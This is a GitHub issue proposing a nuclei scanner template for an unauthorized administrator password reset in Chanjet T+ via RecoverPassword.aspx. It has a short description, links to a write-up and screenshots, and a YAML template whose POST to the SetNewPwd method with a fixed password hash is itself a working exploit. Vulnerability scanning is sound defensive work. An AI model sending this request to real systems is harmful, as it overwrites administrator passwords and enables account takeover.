### ISSUE TITLE
chanjet-tplus-unauthorized-password-modification

### ISSUE THREAD

**Issue by 0xr2r** [projectdiscovery/nuclei-templates#9141]
### Template Information:

Vulnerability description

UFIDA Chanjet T+ RecoverPassword.aspx has an unauthorized administrator password modification vulnerability. An attacker can use the vulnerability to modify the administrator account password to log in to the backend.
Vulnerability recurrence

https://cn-sec.com/archives/1377207.html

![2541080-20230907141150047-1319432143](https://github.com/projectdiscovery/nuclei-templates/assets/72355033/8c6bbb54-526d-4e92-976c-d8d6bbf0b7fe)

![1010](https://github.com/projectdiscovery/nuclei-templates/assets/72355033/6d64cadb-8ddc-4bbf-aab9-9fb165960ffd)

### Nuclei Template:

```yaml
id: chanjet-tplus-unauthorized-password-modification
info:
  name: chanjet-tplus-unauthorized-password-modification
  author: 0xr2r
  severity: high

requests:
  - method: POST
    path:
      - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
    body: |
      {"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '"value":'
          - 'true'
        part: body
```
